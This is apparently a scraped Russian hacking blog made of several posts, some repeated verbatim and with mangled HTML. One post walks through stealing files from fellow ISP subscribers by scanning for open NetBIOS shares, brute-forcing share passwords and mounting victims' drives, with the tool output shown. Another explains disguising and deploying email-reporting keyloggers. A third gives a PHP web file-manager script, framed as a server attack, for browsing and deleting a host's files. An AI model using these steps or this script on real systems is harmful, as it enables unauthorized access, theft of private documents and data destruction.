Зачем жен нам Essential NetTools v3.0? Как было сказано выше - это сканер (более подробное описание вы сможете найти на страничке скачивания), нам же достаточно знать что он позволяет сканировать диапазон IP-адресов на расшаренные ресурсы, и выборочный адрес на шары (расшаренные, шары - ресурсы доступные пользователям рабочей группы, а следовательно и вам!), а также, что тоже немаловажно!, подбирать пароли доступа (не думайте что это такая уж быстрая процедура, но, как правило, в большинстве случаев лица с расшаренными ресурсами - это либо ломаки, либо лица чересчур самоуверенные, либо секретарши на фирмах (кстати почему бы им всем не подумать о безопасности?) у которых пароль подбирается буквально с первой - второй попытки:-))) Кроме того, она позволяет подключать эти самые шары к вашему компьютеру без головной боли (но эта процедура итак не очень утомительная). Ну вроде по этому поводу - все....
HakTek v1.1 - в принципе особой необходимости в этой программе нет, но все-равно рекомендую скачать - мне больше всего нравится Finger Session. Вобщем - читайте описание на страничке скачивания.
Зачем нам Advanced Dialer? Вроде бы простая звонилка... Но у нее есть одна хорошая черта. Вы хотите иметь пароли пользователей вашего провайдера? Тогда ставьте Advanced Dialer ибо он при подключении показывает и ваш IP-адрес и, что самое главное, IP-адрес сервера провайдера к которому вы подключены (так же как и многие другие пользователи!!!;-))) - вот это главное!
Ну, предположим, что вы выполнили все рекомендации. Теперь начнем работу на примере кражи документов с диска С компьютера подключенного к тому же провайдеру что и вы:
Подключаемся к интернет при помощи Advanced Dialer и смотрим IP-адрес сервера провайдера (как правило он никогда не изменяется, так что смело можете записывать его на бумажку), допустим 194.153.128.132 - реальный IP-адрес провайдера ZEOS
Запускаем Essential NetTools v3.0 и выбираем NBScan, там вводим начальный IP-адрес для сканирования "Starting IP adress" (в нашем случае пусть это будет например 194.153.128.0) и конечный IP-адрес "Ending IP adress" (в нашем случае это пусть будет 194.153.128.75, вообще-то конечным должен был бы быть IP 194.153.128.255, но я никогда не видел чтобы кто-то был подключен к адресу более 194.153.128.72, поэтому тратить кучу времени на сканирование еще 180 адресов по-моему просто глупо...
После того как процесс сканирования окончен мы увидим примерно следующее:
NAME WORKGROUP RS IP Adress MAC Adress
Legioner Legion666 Yes 194.153.128.15 это нас не интересует
Vovan Workgroup No 194.153.128.19 это нас не интересует Dmitriy
Venera Yes 194.153.128.21 это нас не интересует
Sinelnikov Claus Yes 194.153.128.32 это нас не интересует
Kinder Troja Yes 194.153.128.43 это нас не интересует
Sky Circus Yes 194.153.128.47 это нас не интересует
Trishka Killers No 194.153.128.64 это нас не интересует
Judge Dred No 194.153.128.69 это нас не интересует
4. Мы видим имена, рабочие группы, RS - расшаренные ресурсы, IP-адреса, адреса МАК компьютеров с NetBios Sessions (то есть с открытым 139 - м портом) Кстати не забудьте включить у себя NetBios - иначе ничего не будет, также для личной безопасности сделайте все диски и принтеры локальными (защитите их от чтения и записи). Нам нужны только: рабочая группа, RS, IP-адреса. Если RS - No - об этом компьютере можно сразу забыть. Если же -Yes, то можно попробовать подключится к нему.
Для этого:
Включаем NAT
Вводим адрес IP - например 194.153.128.15 и нажимаем "SCAN"
Теперь немного подождем...
Что мы видим:
* Checking 194.153.128.47 ...
* Obtained NetBIOS name table:
SKY
SKY
CIRCUS
SKY
CIRCUS
DAN
CIRCUS
..__MSBROWSE__.
* Trying username "ADMINISTRATOR", password "": failed - начало подбора пароля
* Trying username "ADMINISTRATOR", password "ADMINISTRATOR": failed
* Trying username "ADMINISTRATOR", password "GUEST": failed
* Trying username "ADMINISTRATOR", password "ROOT": failed
* Trying username "ADMINISTRATOR", password "ADMIN": failed
* Trying username "ADMINISTRATOR", password "PASSWORD": failed
* Trying username "ADMINISTRATOR", password "TEMP": failed
* Trying username "ADMINISTRATOR", password "SHARE": failed
* Trying username "ADMINISTRATOR", password "WRITE": failed
* Trying username "ADMINISTRATOR", password "FULL": failed
* Trying username "ADMINISTRATOR", password "BOTH": failed
* Trying username "ADMINISTRATOR", password "READ": failed
* Trying username "ADMINISTRATOR", password "FILES": failed
* Trying username "ADMINISTRATOR", password "DEMO": failed
* Trying username "ADMINISTRATOR", password "TEST": failed
* Trying username "ADMINISTRATOR", password "ACCESS": failed
* Trying username "ADMINISTRATOR", password "USER": failed
* Trying username "ADMINISTRATOR", password "BACKUP": failed
* Trying username "ADMINISTRATOR", password "SYSTEM": failed
* Trying username "ADMINISTRATOR", password "SERVER": failed
* Trying username "ADMINISTRATOR", password "LOCAL": failed
* Trying username "GUEST", password "": failed
* Trying username "GUEST", password "ADMINISTRATOR": failed
* Trying username "GUEST", password "GUEST": succeeded - пароль успешно подобран
* Obtained share list: - список возможных доступных ресурсов
IPC$ Remote IPC
E$ Default share
D$ Default share
C
ADMIN$ Remote Admin
C$ Default share
* Obtained server information:
Server=[SKY] User=[] Workgroup=[SKYGROUP] Domain=[]
* Checking share E$: access denied - доступ запрещен
* Checking share D$: access denied - доступ запрещен
* Checking share C: read-write access - доступ разрешен для чтения-записи
* Checking share ADMIN$: access denied
* Checking share C$: access denied
* Finished checking 194.153.128.47
Ну вот мы и нашли подходящую жертву! Как видно из списка, мы можем подключиться к диску С (разрешен доступ для чтения и записи), то есть мы можем записывать жертве на диск, стирать с его диска, копировать с его диска!
Теперь нам нужно подключить удаленный компьютер. В этом нет ничего сложного. Для этого нам нужно изменить рабочую группу согласно вышеописанному способу. В Essential NetTools открыть NBScan и выделить потенциальную "жертву", в нашем случае это Sky с рабочей группой Circus и IP-адресом 194.153.128.47, нажать правую кнопку мышки и выбрать в контекстном меню "Open computer". В ответ откроется стандартное окно Windows где будет присутствовать диск "С". Наводим на этот самый диск "С" нажимаем правую кнопку мыши и в контекстном меню выбираем "Подключить сетевой диск", когда главный каталог будет считан мы можем начинать "лазить", а точнее сказать "ползать" по диску "С" удаленного компьютера с адресом 194.153.128.47, делать это можно при помощи стандартного "Проводника", Windows Commander и других программ.
Метки: точка доступа
Список портов троянских программ


Метки: wi-fi
Накажи шутника
Допустим, что вы всё-таки запустили злополучный файл. И вовремя обнаружили голову (серверную часть) "трояна". Естественно, что каждому интересно, какой шутник подбросил вам какушку. Итак на этой странице я расскажу как вычислить шутника и о способах его наказать, хотя последнее решать вам. Теперь при входе в сеть интернета вам, для того чтобы вычислить шутника, придётся предпринимать определённые действия. Сразу скажу, для вычисления хацкера не надо пользоваться файрволами или слухочами портов (программы, которые следят за открытыми портами компьютера и в случае атаки закрывают порт) - это излишне и в большинстве случаев не дает положительного результата. Хацкера можно вычислить обычными утилитами Windows, одна из них NetStat вы видите её скриншот.

Я расскажу о трёх способах:
1)выкачать предварительно программу-сканер (рекомендую IP-Tools) и при помощи её узнать провайдера шутника и его реквизиты.2) Предварительно выкачать программу, специализированную для этих целей.
Обратиться на web-службы, которые специализируются на предоставлении таких услуг за считанные секунды.
Все программы и службы Вы можете найти в поисковых системах.
Теперь пришло время рассказать ещё об одном замечательном файрволе, который позволяет не только защититься от хацкеров, но и при желании заразить его самого. Данный файрвол доступен по адресу http://www.hacksoft.ru и называется он Netbass (можно скачать с моего портала в разделе Download). Данная программа эмулирует, что ваш компьютер инфицирован "троянским конём". При попытке просканировать или несанкционированно подключится к вашему компьютеру, определяет и записывает в лог файл IP адрес хацкера, а также по желанию пользователя автоматически шлёт жалобу провайдеру хацкера с просьбой отключить тому сеть (есть возможность самому задавать текст сообщения провайдеру). Особой изюминкой программы является то, что есть возможность прописать пути к папкам, куда попадёт хацкер (а в папку самому положить крутой "троян" обозвав его супер нюк 3000, вышибает всё, даже юниксоиды, не говоря о виндах). Хацкеру конечно же захочется его скачать и посмотреть, а как только он его запустит вы можете сами его администрировать. Напоминаю, что данные действия попадают под статью в УК РФ и расцениваются, как несанкционированный доступ. Всвязи с этим, я не рекомендую использовать данный метод мести.
Но как же наказать шутника? Ограничтесь только отправлением письма провайдеру хацкера с указанием IP адреса нападающего (помните, что как правило IP адресс динамический и он изменится при следующем подключении шутника, так что, чем быстрей вы обратитесь к его провайдеру, тем быстрее его накажут).

Метки: точка доступа
Шпионаж!
В этой статье я расскажу ещё об одном методе добычи пользовательских паролей и информации находящейся на атакуемой машине. Данный метод используют программы KeyLog в простонародии "кливиатурные шпионы", программы данного типа призваны отслеживать и записывать в свой лог файл все нажатые клавиши на клавиатуре пользователя. Более продвинутые программы умеют не только просто вести лог нажатых клавиш, но ещё и определяют в каких програмных приложениях были отловлены нажатые клавиши с указанием времени и даже отправкой лог файла на почтовый адрес злоумышленника. Представьте себе сколько клавиш в день вы нажимаете, От набора текствов в редакторах до ввода пароля и логина на доступ в интернет. Я сразу хочу оговорится ,что программы типа KeyLog не являются "троянскими конями" и как правило не используют применение клиент-серверных технологий.
Теперь Вы знаете о существовании таких программ и что они делают. Для того, чтобы подбросить клавиатурного шпиона не надо обычно даже взламывать систему. Как показывает статистика 98% людей которым были подброшены "шпионы", либо сами их устанавливали, либо были установлены знакомыми и сотрудниками для различных целей. Кто просто хотел знать, что творится на его компьютере когда его нет дома или на работе, другие устанавливали специально для слежки за конкурентами ну и третьи конечно же люди жаждущие халявного доступа в сеть. В отличии от "троянских коней", KeyLog'еры и подобные программы определяются намного сложней так как по сути своей не являются вирусами и не позволяют администрировать удалённые компьютеры, так же не создают резервных копий и не инфицируют файлы находящиеся на компьютере жертвы. Как подбрасывается KeyLog? Здесь вариантов много всё зависит от того кому он подбрасывыется, если близкому человеку (другу, любовнице и прочим родственникам) то тут проблем не возникает, как впрочем если это и компьютер шефа. Другое дело если его подкидывают кому то удалённо. "Шпиона" можно подкинуть как в чистом виде так и замаскировать его под какую нибудь хорошую программу при помощи программ которые позволяют склеивать два файла, для этого злоумышленнику необходимо найти в сети такую программу и склеить "шпиона" с любой программой.
Предварительно до склейки или отправки "шпиона" его отстараивают, здесь всё зависить от того каким шпионом он пользуется, обычно шпион содержит настройки в какой файл (имя файла) будет производится запись лога, путь до файла (для того что бы "Шпиён" знал где его найти) при использовании стандартных настроек большинство "шпионов" ведут лог файл в корневой директории диска С:/ или в корневой директории windows (c:/windows/).
Всем известно, что злоумышленнику этот лог файл надо будет потом просмотреть, хорошо конечно если эта машина друга(шефа) или находится в локальной сети но если у "шпиёна" нет доступа к атакуемой машине он скорее всего выбрет KeyLog умеющий отсылать свои лог файл на электронный адрес преимущество таких "шпионов" является то что единственной настройкой которую следует указать это адрес почты на который будут высылаться лог файл. Далее злоумышленник отправляет его вам по электронной почте или вы сами скачиваете его с сайта. После того так жертва (вы) запустит отправленный файл KeyLog проинсталлирует себя и пропишет в реестр для запуска его при последующей загрузке системы и начнёт снимать дамп (вести лог нажатых клавишь). А злоумышленнику остаётся ждать только когда его шпион доложит на его почтовый ящик.

Теперь Вы знаете о существовании таких программ и что они делают. Для того, чтобы подбросить клавиатурного шпиона не надо обычно даже взламывать систему. Как показывает статистика 98% людей которым были подброшены "шпионы", либо сами их устанавливали, либо были установлены знакомыми и сотрудниками для различных целей. Кто просто хотел знать, что творится на его компьютере когда его нет дома или на работе, другие устанавливали специально для слежки за конкурентами ну и третьи конечно же люди жаждущие халявного доступа в сеть. В отличии от "троянских коней", KeyLog'еры и подобные программы определяются намного сложней так как по сути своей не являются вирусами и не позволяют администрировать удалённые компьютеры, так же не создают резервных копий и не инфицируют файлы находящиеся на компьютере жертвы. Как подбрасывается KeyLog? Здесь вариантов много всё зависит от того кому он подбрасывыется, если близкому человеку (другу, любовнице и прочим родственникам) то тут проблем не возникает, как впрочем если это и компьютер шефа. Другое дело если его подкидывают кому то удалённо. "Шпиона" можно подкинуть как в чистом виде так и замаскировать его под какую нибудь хорошую программу при помощи программ которые позволяют склеивать два файла, для этого злоумышленнику необходимо найти в сети такую программу и склеить "шпиона" с любой программой.
Предварительно до склейки или отправки "шпиона" его отстараивают, здесь всё зависить от того каким шпионом он пользуется, обычно шпион содержит настройки в какой файл (имя файла) будет производится запись лога, путь до файла (для того что бы "Шпиён" знал где его найти) при использовании стандартных настроек большинство "шпионов" ведут лог файл в корневой директории диска С:/ или в корневой директории windows (c:/windows/).
Всем известно, что злоумышленнику этот лог файл надо будет потом просмотреть, хорошо конечно если эта машина друга(шефа) или находится в локальной сети но если у "шпиёна" нет доступа к атакуемой машине он скорее всего выбрет KeyLog умеющий отсылать свои лог файл на электронный адрес преимущество таких "шпионов" является то что единственной настройкой которую следует указать это адрес почты на который будут высылаться лог файл. Далее злоумышленник отправляет его вам по электронной почте или вы сами скачиваете его с сайта. После того так жертва (вы) запустит отправленный файл KeyLog проинсталлирует себя и пропишет в реестр для запуска его при последующей загрузке системы и начнёт снимать дамп (вести лог нажатых клавишь). А злоумышленнику остаётся ждать только когда его шпион доложит на его почтовый ящик.

Метки: настройки
Взлом сервера/провайдера при помощи РНР скрипта
В этой статье я расскажу, как можно взломать сервер при помощи PHP скрипта. Многие провайдеры и компании предоставляющие хостинг отказываются от предоставления услуги запуска пользовательских CGI скриптов из-за так сказать соображений собственной безопасности. Конечно CGI скрипты не без греха в плане безопасности, а ленивые админы не желающие или не умеющие работать с сервисными службами при просьбе разрешить запуск своих собственных CGI скриптов на сайте отвечают, что мы вот вам разрешили исполнять PHP этим и пользуйтесь, а открывать CGI скриптами верный путь к атакам сервера мы не хотим и не дадим!!! Давайте рассмотрим так уж безопасен ли PHP для сервера как об этом говорят.
Данная информация опубликована только для цели информировать разработчиков PHP и администраторов серверов о возможности атаки сервера через PHP скрипты. Никакой ответственности за практическое осмысление данной информации пользователями я не несу!
Язык PHP имеет довольно много функций работы с файлами, разработанный мной скрипт реализует дыру под названием Save mode то есть ошибку которую допустили разработчики PHP 3- 4. Данная атака на сервер проходит со 100% гарантией. Для успешной атаки сервера взломщику необходим клочок дискового пространстве на сервере размером в 10 Kb (ровно столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему использую социнженерию, то есть изначально подготавливают жертву, что бы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании которую хакер собирается взломать. В большей части взлому подвержены бесплатные хостинговые компании и провайдеры которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов. Идея реализации атаки заключается в том, что бы залезть на жёсткий диск провайдера и иметь возможность управлять файлами то есть удалять, просматривать, редактировать. Конечно ни один провайдер не даст вам посмотреть файлы и каталоги которые размещены у него на сервере тем боле, что то там менять или удалять. Ну коль мы не можем посмотреть, что и где лежит у провайдера пусть за нас посмотрит PHP скрипт . Для этого нам придётся написать сравнительно небольшой скрипт для управления файлами на сайте который получит доступ к ресурсам сервера. Для начала определим какими функциями должен обладать скрипт. Заложим в него функции удаления выбранных файлов, скрипт должен уметь просматривать картинки, открывать каталоги, выставлять права доступа к файлам, знать когда файл был создан в системе, когда файл был изменён, к какой группе относится файл и выставлять соответствующую иконку для удобства , что бы мы на взгляд могли определить что за файл, переходить из каталога в каталог, указывать полные пути до файлов . Думаю этих функций будет достаточно для того, что бы без труда можно было ориентироваться не сервере провайдера. Теперь когда мы определились, что будет делать скрипт приступим к его написанию с детальным пояснением что где происходит.
// говорим что это PHP скрипт
function cmp( $a, $b ) // обьявляем функции
{
GLOBAL $sort; // сортируем полученные функции
if( $a->inode == $b->inode )
return 0;
switch( $sort ) // объявляем , что по каким функциям будет сортироваться
{
case "size":
return ($a->size > $b->size) ? -1 : 1;
case "type":
return strcmp($a->type, $b->type);
case "view":
return strcmp($a->view, $b->view);
case "atime":
return ($a->atime > $b->atime) ? -1 : 1;
case "ctime":
return ($a->ctime > $b->ctime) ? -1 : 1;
case "mtime":
return ($a->mtime > $b->mtime) ? -1 : 1;
case "group":
return strcmp($a->group, $b->group);
case "inode":
return ($a->inode > $b->inode) ? -1 : 1;
case "owner":
return strcmp($a->owner, $b->owner);
case "perms":
return ($a->perms > $b->perms) ? -1 : 1;
case "ext":
return strcmp($a->ext, $b->ext);
case "name":
default:
return 1;
}
}
function getIcons( $ext ) // объявляем функцию сопоставления иконки с типом файла
{
switch( $ext )
{
case "dir":
$file = "dir";
break;
case "link":
$file = "link";
break;
case "zip":
case "tgz":
case "gz":
case "Z":
$file = "compressed";
break;
case "gif":
case "jpg":
$file = "image2";
break;
case "dvi":
$file = "dvi";
break;
case "":
case "exe":
$file = "binary";
break;
case "sh":
case "php":
case "php3":
case "sql":
case "inc":
case "js":
$file = "script";
break;
case "txt":
$file = "text";
break;
case "html":
case "shtml":
case "phtml":
$file = "world1";
break;
default:
$file = "generic";
break;
}
return $IMG="
";
}
class MyFile { /* объявляем какие данные будут получены */
var $name;
var $path;
var $type;
var $ext;
var $stype;
var $sfile;
var $size;
var $file;
var $atime;
var $ctime;
var $mtime;
var $group;
var $inode;
var $owner;
var $perms;
function set( $filename, $path )
{
GLOBAL $cd; /* объявляем функции перехода по каталогам */
// далее без коментариев думаю и так всем будет понятно что происходит
$this->name = $filename;
$this->path = $path ;
$this->file = $this->path."/".$this->name;
$this->type = filetype( $this->file );
$this->size = filesize( $this->file );
$this->atime = fileatime( $this->file );
$this->ctime = filectime( $this->file );
$this->mtime = filemtime( $this->file );
$this->group = filegroup( $this->file );
$this->inode = fileinode( $this->file );
$this->owner = fileowner( $this->file );
$this->perms = fileperms( $this->file );
switch( $this->type )
{
case "link":
$this->sfile = readlink( $this->file );
$this->stype = filetype( $this->sfile );
$this->ext = "link";
break;
case "file":
$list = explode( ".", $this->name );
$nb = sizeof( $list );
if( $nb > 0 )
$this->stype = $list[$nb-1];
else
$this->stype = "???";
$this->ext = $this->stype;
switch( $this->stype )
{
case "gif":
case "GIF":
case "jpg":
case "JPG":
if( isset( $cd ) )
$pwd = $cd."/";
else
$pwd = "";
$this->sfile = "
";
break;
default:
$this->sfile = $this->stype;
break;
}
break;
default:
$this->stype = "";
$this->sfile = "";
$this->ext = $this->type;
break;
}
}
function formatSize()
{
return number_format( $this->size, 0, ".", " ");
}
}
function genUrl( $ref, $args, $key = "", $val = "" )
{
$valist = "";
reset( $args );
if( $key != "" )
$args[ "$key" ] = $val;
if( !is_array( $args ) )
return $ref;
while( list( $key, $val ) = each( $args ) )
{
if( $val == "" )
continue;
if( $valist == "" )
$valist .= "?";
else
$valist .= "&";
$valist .= $key."=".$val;
}
return $ref.$valist;
}
function updir( $path )
{
$last = strrchr( $path, "/" );
$n1 = strlen( $last );
$n2 = strlen( $path );
return substr( $path, 0, $n2-$n1 );
}
$ref = "dir.php";
if( isset( $cd ) )
{
$path = $cd;
//$lcd = "?cd=$cd'";
$args[ "cd" ] = $cd;
}
else
{
$path = ".";
//$lcd = "";
$args[ "cd" ] = "";
}
if( isset( $nb ) )
{
for( $i = 0; $i < $nb; $i++ )
{
$var = "id_$i";
if( isset( $$var ) )
{
$file = $path."/".$$var;
if( is_file( $file ) || is_link( $file ) )
{
if( unlink( $file ) )
echo "
$file успешно удалён\n"; //сообщение об успешном удалении файла
else
echo "
Не могу удалить выставите права доступа $file\n"; //сообщение о невозможности удалить файл который доступен только для чтения
}
elseif( is_dir( $file ) )
{
if( rmdir( $file ) )
echo "
$file успешно удалён\n"; // сообщение об успешном удалении
else
echo "
файл недоступен для удаления$file\n"; //сообщение о невозможности удалить файл
}
}
}
}
$step = 100;
if( !isset( $sort ) )
$sort = "name";
else
$args[ "sort" ] = $sort;
if( !isset( $from ) )
$from = 0;
else
$args[ "from" ] = $from;
if( !isset( $to ) )
$to = $from + $step;
$d = dir($path);
echo "\n";
echo "
Вернуться в начало\n"; // ссылка на возврат в домашнею директорию скрипта
$updir = updir($d->path);
if( $updir != "." )
echo "
Подняться на директорию вверх; $updir\n"; //ссылка на директорию в верх
echo "
Открыть директорию: path."/..>..\n"; // обновление текущей директории
echo "
Текущая директория: ".$d->path."\n"; // показываем путь до директории и файлов которые в ней находятся
$n = 0;
while( $entry=$d->read() )
{
$lFiles[ $n ] = new MyFile;
$lFiles[ $n ]->set( $entry, $path );
$n++;
}
$d->close();
// создаём HTML форму управления функциями
echo "\n";
echo "\n";
echo "
\n";
$from = $from - $step;
if( isset( $cd ) )
{
echo "\n";
}
echo "\n";
//echo "
from=$from;to=$to;n=$n\n";
echo "
\n";
if( $from >= 0 )
{
echo "Предыдущий/\n";
}
if( $to <= $n )
{
echo "Далее \n";
}
echo "
\n";
echo "\n";
echo "\n";
?> // говорим что PHP скрипт кончился
Вот реализация скрипта который позволяет вам получить доступ в каталоги провайдера содержащиеся у него на винчестере. Потенциальная опасность применения данного скрипта в том, что злоумышленник получает практически всю информацию о сервере, так же злоумышленник получает доступ до незабвенной папки etc где хранятся пароли. При проверке работоспособности скрипта и проверке на уязвимости было выявлено, что все сервера на которых разрешён запуск PHP оказались подвержены данной атаке. Опробованы методы атаки удалённых хостинговых компаний и провайдеров. Скрипт помещяется на сервер провайдера где вам разрешен запуск PHP скриптов как я уже сказал в директорию домашней странички. По умолчанию скрипт просматривает все находящиеся файлы в той директории, куда он был загружен (запущен) для того, что бы попасть в корневой каталог сервера жмите на ссылку "Подняться на каталог выше" до тех пор, пока вы не увидите корневой каталог сервера. При выходе из вашей директории скрипт возможно (очень редко) сообщит вам о невозможности выйти из вашего каталога, это сообщение сервера игнорируйте и жмите на ссылку "Подняться на каталог вверх" скрипт передаст данные серверу о том, что каталоги которые вы пытаетесь просмотреть являются вашими и вас миролюбиво пропустят. Эк сплоит данного скрипта предоставлен с ограничениями вы можете только просматривать содержимое папок и удалять файлы которые не защищены системой. Скрипт представлен только для того, что бы указать на возможность получения и удаления любой информации с сервера. Даже для среднего хацкера знать о системе провайдера всё это уже очень много.
Просмотреть исходник скрипта можно [здесь]
Скачать скрипт можно [здесь]
(Данная уязвимость устраняется установкой openBaseDir)
Данная информация опубликована только для цели информировать разработчиков PHP и администраторов серверов о возможности атаки сервера через PHP скрипты. Никакой ответственности за практическое осмысление данной информации пользователями я не несу!
Язык PHP имеет довольно много функций работы с файлами, разработанный мной скрипт реализует дыру под названием Save mode то есть ошибку которую допустили разработчики PHP 3- 4. Данная атака на сервер проходит со 100% гарантией. Для успешной атаки сервера взломщику необходим клочок дискового пространстве на сервере размером в 10 Kb (ровно столько весит скрипт) и возможность запустить свой PHP скрипт. Далеко не секрет, что хакеры очень часто проникают в систему использую социнженерию, то есть изначально подготавливают жертву, что бы та им доверяла, получают от неё информацию и осуществляют взлом. Поэтому раздобыть на любом сервере небольшое дисковое пространство для хакера не проблема. В крайнем случае можно и купить себе домен на сервере провайдера или любой другой хостинговой компании которую хакер собирается взломать. В большей части взлому подвержены бесплатные хостинговые компании и провайдеры которые при регистрации доступа в интернет дают бесплатное место для размещение домашней странички пользователя с запуском собственных PHP скриптов. Идея реализации атаки заключается в том, что бы залезть на жёсткий диск провайдера и иметь возможность управлять файлами то есть удалять, просматривать, редактировать. Конечно ни один провайдер не даст вам посмотреть файлы и каталоги которые размещены у него на сервере тем боле, что то там менять или удалять. Ну коль мы не можем посмотреть, что и где лежит у провайдера пусть за нас посмотрит PHP скрипт . Для этого нам придётся написать сравнительно небольшой скрипт для управления файлами на сайте который получит доступ к ресурсам сервера. Для начала определим какими функциями должен обладать скрипт. Заложим в него функции удаления выбранных файлов, скрипт должен уметь просматривать картинки, открывать каталоги, выставлять права доступа к файлам, знать когда файл был создан в системе, когда файл был изменён, к какой группе относится файл и выставлять соответствующую иконку для удобства , что бы мы на взгляд могли определить что за файл, переходить из каталога в каталог, указывать полные пути до файлов . Думаю этих функций будет достаточно для того, что бы без труда можно было ориентироваться не сервере провайдера. Теперь когда мы определились, что будет делать скрипт приступим к его написанию с детальным пояснением что где происходит.
// говорим что это PHP скрипт
function cmp( $a, $b ) // обьявляем функции
{
GLOBAL $sort; // сортируем полученные функции
if( $a->inode == $b->inode )
return 0;
switch( $sort ) // объявляем , что по каким функциям будет сортироваться
{
case "size":
return ($a->size > $b->size) ? -1 : 1;
case "type":
return strcmp($a->type, $b->type);
case "view":
return strcmp($a->view, $b->view);
case "atime":
return ($a->atime > $b->atime) ? -1 : 1;
case "ctime":
return ($a->ctime > $b->ctime) ? -1 : 1;
case "mtime":
return ($a->mtime > $b->mtime) ? -1 : 1;
case "group":
return strcmp($a->group, $b->group);
case "inode":
return ($a->inode > $b->inode) ? -1 : 1;
case "owner":
return strcmp($a->owner, $b->owner);
case "perms":
return ($a->perms > $b->perms) ? -1 : 1;
case "ext":
return strcmp($a->ext, $b->ext);
case "name":
default:
return 1;
}
}
function getIcons( $ext ) // объявляем функцию сопоставления иконки с типом файла
{
switch( $ext )
{
case "dir":
$file = "dir";
break;
case "link":
$file = "link";
break;
case "zip":
case "tgz":
case "gz":
case "Z":
$file = "compressed";
break;
case "gif":
case "jpg":
$file = "image2";
break;
case "dvi":
$file = "dvi";
break;
case "":
case "exe":
$file = "binary";
break;
case "sh":
case "php":
case "php3":
case "sql":
case "inc":
case "js":
$file = "script";
break;
case "txt":
$file = "text";
break;
case "html":
case "shtml":
case "phtml":
$file = "world1";
break;
default:
$file = "generic";
break;
}
return $IMG="

}
class MyFile { /* объявляем какие данные будут получены */
var $name;
var $path;
var $type;
var $ext;
var $stype;
var $sfile;
var $size;
var $file;
var $atime;
var $ctime;
var $mtime;
var $group;
var $inode;
var $owner;
var $perms;
function set( $filename, $path )
{
GLOBAL $cd; /* объявляем функции перехода по каталогам */
// далее без коментариев думаю и так всем будет понятно что происходит
$this->name = $filename;
$this->path = $path ;
$this->file = $this->path."/".$this->name;
$this->type = filetype( $this->file );
$this->size = filesize( $this->file );
$this->atime = fileatime( $this->file );
$this->ctime = filectime( $this->file );
$this->mtime = filemtime( $this->file );
$this->group = filegroup( $this->file );
$this->inode = fileinode( $this->file );
$this->owner = fileowner( $this->file );
$this->perms = fileperms( $this->file );
switch( $this->type )
{
case "link":
$this->sfile = readlink( $this->file );
$this->stype = filetype( $this->sfile );
$this->ext = "link";
break;
case "file":
$list = explode( ".", $this->name );
$nb = sizeof( $list );
if( $nb > 0 )
$this->stype = $list[$nb-1];
else
$this->stype = "???";
$this->ext = $this->stype;
switch( $this->stype )
{
case "gif":
case "GIF":
case "jpg":
case "JPG":
if( isset( $cd ) )
$pwd = $cd."/";
else
$pwd = "";
$this->sfile = "
break;
default:
$this->sfile = $this->stype;
break;
}
break;
default:
$this->stype = "";
$this->sfile = "";
$this->ext = $this->type;
break;
}
}
function formatSize()
{
return number_format( $this->size, 0, ".", " ");
}
}
function genUrl( $ref, $args, $key = "", $val = "" )
{
$valist = "";
reset( $args );
if( $key != "" )
$args[ "$key" ] = $val;
if( !is_array( $args ) )
return $ref;
while( list( $key, $val ) = each( $args ) )
{
if( $val == "" )
continue;
if( $valist == "" )
$valist .= "?";
else
$valist .= "&";
$valist .= $key."=".$val;
}
return $ref.$valist;
}
function updir( $path )
{
$last = strrchr( $path, "/" );
$n1 = strlen( $last );
$n2 = strlen( $path );
return substr( $path, 0, $n2-$n1 );
}
$ref = "dir.php";
if( isset( $cd ) )
{
$path = $cd;
//$lcd = "?cd=$cd'";
$args[ "cd" ] = $cd;
}
else
{
$path = ".";
//$lcd = "";
$args[ "cd" ] = "";
}
if( isset( $nb ) )
{
for( $i = 0; $i < $nb; $i++ )
{
$var = "id_$i";
if( isset( $$var ) )
{
$file = $path."/".$$var;
if( is_file( $file ) || is_link( $file ) )
{
if( unlink( $file ) )
echo "
$file успешно удалён\n"; //сообщение об успешном удалении файла
else
echo "
Не могу удалить выставите права доступа $file\n"; //сообщение о невозможности удалить файл который доступен только для чтения
}
elseif( is_dir( $file ) )
{
if( rmdir( $file ) )
echo "
$file успешно удалён\n"; // сообщение об успешном удалении
else
echo "
файл недоступен для удаления$file\n"; //сообщение о невозможности удалить файл
}
}
}
}
$step = 100;
if( !isset( $sort ) )
$sort = "name";
else
$args[ "sort" ] = $sort;
if( !isset( $from ) )
$from = 0;
else
$args[ "from" ] = $from;
if( !isset( $to ) )
$to = $from + $step;
$d = dir($path);
echo "\n";
echo "
Вернуться в начало\n"; // ссылка на возврат в домашнею директорию скрипта
$updir = updir($d->path);
if( $updir != "." )
echo "
Подняться на директорию вверх; $updir\n"; //ссылка на директорию в верх
echo "
Открыть директорию: path."/..>..\n"; // обновление текущей директории
echo "
Текущая директория: ".$d->path."\n"; // показываем путь до директории и файлов которые в ней находятся
$n = 0;
while( $entry=$d->read() )
{
$lFiles[ $n ] = new MyFile;
$lFiles[ $n ]->set( $entry, $path );
$n++;
}
$d->close();
// создаём HTML форму управления функциями
echo "\n";
echo "
D | \n"; //echo "Type | \n"; echo "Имя | \n"; echo "Размер | \n"; echo "Класс | \n"; echo "В системе | \n"; echo "Создан | \n"; echo "Изменён | \n"; echo "Размер | \n"; echo "Группа | \n"; echo "ow | \n"; echo "in | \n"; echo "Показ | \n"; echo "||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
\n"; $IMG=getIcons( $lFiles[ $k ]->ext ); $dform = "M j y H:i"; // echo " | ".$lFiles[ $k ]->type." | \n"; echo "$IMG".$lFiles[ $k ]->name." | \n"; echo "".$lFiles[ $k ]->formatSize()." | \n"; echo "".$lFiles[ $k ]->ext ." | \n"; echo "".date( $dform, $lFiles[ $k ]->atime )." | \n"; echo "".date( $dform, $lFiles[ $k ]->ctime )." | \n"; echo "".date( $dform, $lFiles[ $k ]->mtime )." | \n"; echo "".$lFiles[ $k ]->perms." | \n"; echo "".$lFiles[ $k ]->group." | \n"; echo "".$lFiles[ $k ]->owner." | \n"; echo "".$lFiles[ $k ]->inode." | \n"; switch( $lFiles[ $k ]->type ) { case "link": if( $lFiles[ $k ]->stype == "dir" ) { $tcd = $lFiles[ $k ]->path."/".$lFiles[ $k ]->name; echo "". $lFiles[ $k ]->sfile." | \n";
}
else
